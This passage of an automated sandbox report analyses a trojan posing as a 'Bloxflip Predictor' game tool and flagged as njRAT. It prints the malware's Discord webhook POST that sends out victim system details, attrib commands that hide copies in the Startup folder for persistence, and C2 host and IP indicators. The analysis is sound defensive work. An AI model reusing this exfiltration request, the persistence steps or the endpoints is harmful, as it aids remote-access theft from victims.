                                          Dec 13, 2024 12:35:20.490376949 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:20.494048119 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:20.610263109 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:20.610284090 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:20.611332893 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:20.731307983 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:20.732337952 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:20.852142096 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:20.852421999 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:20.972678900 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:20.973373890 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:21.093156099 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:21.093295097 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:21.214667082 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:21.214724064 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:21.334808111 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:21.335000038 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:21.455499887 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:21.455653906 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:21.575894117 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:21.576225996 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:21.696105957 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:21.696331978 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:21.816241026 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:21.816351891 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:21.936503887 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:21.936649084 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:22.056852102 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:22.056998968 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:22.218343973 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:22.219347954 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:22.421463966 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:22.421684980 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:22.671458006 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:22.672226906 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:22.917610884 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:22.918879032 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:23.165589094 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:23.165674925 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:23.413547993 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:23.413726091 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:23.661498070 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:23.661719084 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:23.909482002 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:23.909616947 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:24.157480955 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:24.157726049 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:24.405630112 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:24.405913115 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:24.653482914 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:24.656574011 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:24.901706934 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:24.904347897 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:25.150242090 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:25.150455952 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:25.397519112 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:25.397630930 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:25.645637035 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:25.648411036 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:25.893454075 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:25.893584013 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:26.141632080 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:26.141990900 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:26.390249968 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:26.390620947 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:26.637518883 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:26.637721062 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:26.889467955 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:26.891381979 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:27.137538910 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:27.137727976 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:27.386390924 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:27.387702942 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:27.633743048 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:27.635389090 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:27.885756969 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:27.886051893 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:28.134301901 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:28.134509087 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:28.381511927 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:28.381778955 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:28.629956007 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:28.630153894 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:28.877429008 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:28.879367113 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:29.125643969 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:29.125757933 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:29.373498917 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:29.373673916 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:29.622287989 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:29.622400999 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:29.869544983 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:29.872325897 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:30.117626905 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:30.117798090 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:30.365459919 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:30.368768930 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:30.474096060 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:30.488848925 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:32.507538080 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:32.627440929 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:32.628415108 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:32.630743027 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:32.750596046 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:32.752470016 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:32.872895002 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:32.873009920 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:32.993105888 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:32.993184090 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:33.113333941 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:33.116336107 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:33.236309052 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:33.240505934 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:33.360575914 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:33.364372015 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:33.484369993 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:33.486701965 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:33.606566906 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:33.608285904 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:33.728178978 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:33.728288889 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:33.848046064 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:34.081837893 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:34.201643944 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:34.204293013 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:34.324219942 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:34.324340105 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:34.444849968 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:34.448355913 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:34.568608046 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:34.572340012 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:34.692235947 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:34.692341089 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:34.812493086 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:34.812607050 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:34.932632923 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:34.932789087 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:35.053524971 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:35.053723097 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:35.174052954 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:35.174272060 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:35.294109106 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:35.294226885 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:35.414577961 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:35.414666891 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:35.534984112 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:35.535090923 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:35.655306101 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:35.655431032 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:35.776554108 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:35.776645899 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:35.897273064 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:35.900429010 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:36.020889044 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:36.021096945 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:36.141395092 CET1039749985147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:36.141484976 CET4998510397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:36.261579990 CET1039749985147.185.221.224192.168.2.5
                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 13, 2024 12:31:51.341891050 CET5698253192.168.2.51.1.1.1
                                          Dec 13, 2024 12:31:51.480787039 CET53569821.1.1.1192.168.2.5
                                          Dec 13, 2024 12:31:55.745636940 CET6510453192.168.2.51.1.1.1
                                          Dec 13, 2024 12:31:56.001827955 CET53651041.1.1.1192.168.2.5
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Dec 13, 2024 12:31:51.341891050 CET192.168.2.51.1.1.10x775fStandard query (0)discord.comA (IP address)IN (0x0001)false
                                          Dec 13, 2024 12:31:55.745636940 CET192.168.2.51.1.1.10x8032Standard query (0)quite-cs.at.ply.ggA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Dec 13, 2024 12:31:51.480787039 CET1.1.1.1192.168.2.50x775fNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                          Dec 13, 2024 12:31:51.480787039 CET1.1.1.1192.168.2.50x775fNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                          Dec 13, 2024 12:31:51.480787039 CET1.1.1.1192.168.2.50x775fNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                          Dec 13, 2024 12:31:51.480787039 CET1.1.1.1192.168.2.50x775fNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                          Dec 13, 2024 12:31:51.480787039 CET1.1.1.1192.168.2.50x775fNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                          Dec 13, 2024 12:31:56.001827955 CET1.1.1.1192.168.2.50x8032No error (0)quite-cs.at.ply.gg147.185.221.224A (IP address)IN (0x0001)false
                                          • discord.com
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.549714162.159.137.232443428C:\Windows\Bloxflip Predictor.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-13 11:31:52 UTC255OUTPOST /api/webhooks/1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZYDHIuWHv2Qzzn-JTgsdIp HTTP/1.1
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: discord.com
                                          Content-Length: 247
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          2024-12-13 11:31:53 UTC25INHTTP/1.1 100 Continue
                                          2024-12-13 11:31:53 UTC1OUTData Raw: 63
                                          Data Ascii: c
                                          2024-12-13 11:31:53 UTC246OUTData Raw: 6f 6e 74 65 6e 74 3d 59 6f 75 2b 68 61 76 65 2b 61 2b 72 75 6e 6e 69 6e 67 2b 63 6f 6d 70 75 74 65 72 2e 2e 2e 25 30 64 25 30 61 69 6e 66 6f 72 6d 61 74 69 6f 6e 2b 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 25 30 64 25 30 61 25 35 62 25 32 62 25 35 64 2b 4e 61 6d 65 2b 2b 2b 25 33 61 2b 61 6c 66 6f 6e 73 25 30 64 25 30 61 25 35 62 25 32 62 25 35 64 2b 53 79 73 74 65 6d 2b 25 33 61 2b 4d 69 63 72 6f 73 6f 66 74 2b 57 69 6e 64 6f 77 73 2b 31 30 2b 50 72 6f 25 30 64 25 30 61 25 35 62 25 32 62 25 35 64 2b 48 6f 73 74 2b 2b 2b 25 33 61 2b 71 75 69 74 65 2d 63 73 2e 61 74 2e 70 6c 79 2e 67 67 25 30 64 25 30 61 25 35 62 25 32 62 25 35 64 2b 50 6f 72 74 2b 2b 2b 25 33 61 2b 31 30 33 39 37
                                          Data Ascii: ontent=You+have+a+running+computer...%0d%0ainformation+------------------------------%0d%0a%5b%2b%5d+Name+++%3a+user%0d%0a%5b%2b%5d+System+%3a+Microsoft+Windows+10+Pro%0d%0a%5b%2b%5d+Host+++%3a+quite-cs.at.ply.gg%0d%0a%5b%2b%5d+Port+++%3a+10397
                                          2024-12-13 11:31:53 UTC1302INHTTP/1.1 404 Not Found
                                          Date: Fri, 13 Dec 2024 11:31:53 GMT
                                          Content-Type: application/json
                                          Content-Length: 45
                                          Connection: close
                                          Cache-Control: public, max-age=3600, s-maxage=3600
                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                          x-ratelimit-limit: 5
                                          x-ratelimit-remaining: 4
                                          x-ratelimit-reset: 1734089514
                                          x-ratelimit-reset-after: 1
                                          via: 1.1 google
                                          alt-svc: h3=":443"; ma=86400
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n9wbsGCU7WkE%2FAtznTqtdQcBmchAp1Y%2Ftal2agipQu6gJShuOgAt6wF1BFedC2mkbQka87vBjO1C3QQhfV%2Bt1BsgOmy2xAsUYAOt%2BfBksRAohlWjfA40K6ZBFZmr"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          X-Content-Type-Options: nosniff
                                          Set-Cookie: __cfruid=d3f28fe7b7367f135ebf22d2ac86ded1e15eb002-1734089513; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                          Set-Cookie: _cfuvid=pnFd6BJ.ITU12cb7tlltd2RqJsrP8UVkk0QdnIVrVG4-1734089513550-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                          Server: cloudflare
                                          CF-RAY: 8f15a160bce84387-EWR
                                          {"message": "Unknown Webhook", "code": 10015}


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:1
                                          Start time:06:31:29
                                          Start date:13/12/2024
                                          Path:C:\Users\user\Desktop\Bloxflip Predictor.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Bloxflip Predictor.exe"
                                          Imagebase:0x510000
                                          File size:28'160 bytes
                                          MD5 hash:7BF897CA59B77AD3069C07149C35F97E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                          • Rule: Njrat, Description: detect njRAT in memory, Source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Njrat, Description: detect njRAT in memory, Source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          Reputation:low
                                          Has exited:true

                                          Target ID:2
                                          Start time:06:31:39
                                          Start date:13/12/2024
                                          Path:C:\Windows\Bloxflip Predictor.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Bloxflip Predictor.exe"
                                          Imagebase:0xbd0000
                                          File size:28'160 bytes
                                          MD5 hash:7BF897CA59B77AD3069C07149C35F97E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Windows\Bloxflip Predictor.exe, Author: Joe Security
                                          • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: C:\Windows\Bloxflip Predictor.exe, Author: unknown
                                          • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Windows\Bloxflip Predictor.exe, Author: Florian Roth
                                          • Rule: Njrat, Description: detect njRAT in memory, Source: C:\Windows\Bloxflip Predictor.exe, Author: JPCERT/CC Incident Response Group
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Windows\Bloxflip Predictor.exe, Author: ditekSHen
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_attrib, Description: Detects executables using attrib with suspicious attributes attributes, Source: C:\Windows\Bloxflip Predictor.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Windows\Bloxflip Predictor.exe, Author: ditekSHen
                                          Antivirus matches:
                                          • Detection: 100%, Avira
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 84%, ReversingLabs
                                          Reputation:low
                                          Has exited:false

                                          Target ID:3
                                          Start time:06:31:39
                                          Start date:13/12/2024
                                          Path:C:\Windows\SysWOW64\attrib.exe
                                          Wow64 process (32bit):true
                                          Commandline:attrib +h +r +s "C:\Windows\Bloxflip Predictor.exe"
                                          Imagebase:0x950000
                                          File size:19'456 bytes
                                          MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:4
                                          Start time:06:31:39
                                          Start date:13/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:06:31:49
                                          Start date:13/12/2024
                                          Path:C:\Windows\SysWOW64\attrib.exe
                                          Wow64 process (32bit):true
                                          Commandline:attrib +h +r +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"
                                          Imagebase:0x950000
                                          File size:19'456 bytes
                                          MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:7
                                          Start time:06:31:49
                                          Start date:13/12/2024
                                          Path:C:\Windows\SysWOW64\attrib.exe
                                          Wow64 process (32bit):true
                                          Commandline:attrib +h +r +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"
                                          Imagebase:0x950000
                                          File size:19'456 bytes
                                          MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:8
                                          Start time:06:31:49
                                          Start date:13/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:9
                                          Start time:06:31:49
                                          Start date:13/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:10
                                          Start time:06:31:54
                                          Start date:13/12/2024
                                          Path:C:\Windows\Bloxflip Predictor.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Bloxflip Predictor.exe"
                                          Imagebase:0xfb0000
                                          File size:28'160 bytes
                                          MD5 hash:7BF897CA59B77AD3069C07149C35F97E
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000A.00000002.2394132880.0000000003401000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          Reputation:low
                                          Has exited:true

                                          Target ID:12
                                          Start time:06:32:43
                                          Start date:13/12/2024
                                          Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"
                                          Imagebase:0xe90000
                                          File size:28'160 bytes
                                          MD5 hash:7BF897CA59B77AD3069C07149C35F97E
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000C.00000002.2880439130.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: Joe Security
                                          • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: unknown
                                          • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: Florian Roth
                                          • Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: JPCERT/CC Incident Response Group
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: ditekSHen
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_attrib, Description: Detects executables using attrib with suspicious attributes attributes, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: ditekSHen
                                          Antivirus matches:
                                          • Detection: 100%, Avira
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 84%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:28.4%
